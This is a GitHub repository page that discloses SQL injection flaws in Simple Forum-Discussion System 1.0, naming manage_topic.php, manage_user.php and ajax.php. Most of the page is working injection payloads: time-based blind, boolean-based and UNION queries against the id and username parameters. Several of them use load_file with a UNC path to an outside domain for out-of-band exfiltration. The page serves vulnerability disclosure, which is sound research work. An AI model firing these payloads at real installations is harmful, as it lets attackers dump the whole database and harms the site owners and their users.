Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/oretnom23/Forum-Discussion-System-1.0/
CVE-nu11secur1ty/vendors/oretnom23/Forum-Discussion-System-1.0/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
PoC
 
 
 
 
 
 

Simple Forum-Discussion System 1.0

Vendor

Description:

Multiple SQL-Injections are found on Simple Forum-Discussion System 1.0 For example on three applications which are manage_topic.php, manage_user.php, and ajax.php. The attacker can be retrieving all information from the database of this system by using this vulnerability.

[+]Payloads:

Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=(select load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix')) AND (SELECT 4985 FROM (SELECT(SLEEP(5)))Eggb)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=(select load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix')) UNION ALL SELECT NULL,NULL,CONCAT(0x7162627871,0x564c7a5164475979514c4879487159576946726147756c7746504d696a5a6c6554547345776f4d61,0x716a7a7171),NULL,NULL,NULL-- -
  • for user suser2@gmail.com

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=135628119 or 8604=08604 AND 5328=5328&mtype=own

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=135628119 or 8604=08604 AND (SELECT 6263 FROM (SELECT(SLEEP(5)))lewZ)&mtype=own

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-6332 UNION ALL SELECT CONCAT(0x7176766b71,0x4b717847474f67485458796b544c50486c656e637779445a6c506b63756d564a544f665364557772,0x7171707871),NULL,NULL,NULL,NULL-- -&mtype=own
  • for user suser2@gmail.com

Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=GnxaCRMw'+(select load_file('\\\\p2s8tasb7fditu3yy21otus6sxyqmjg77av2is6h.nu11secur1tyPenetrationTestingEngineer.net\\fnu'))+'' AND (SELECT 1271 FROM (SELECT(SLEEP(5)))MBvz) AND 'eIbF'='eIbF&password=t4F!v8o!H8
  • for user suser2@gmail.com

Reproduce:

href

Proof and Exploit:

href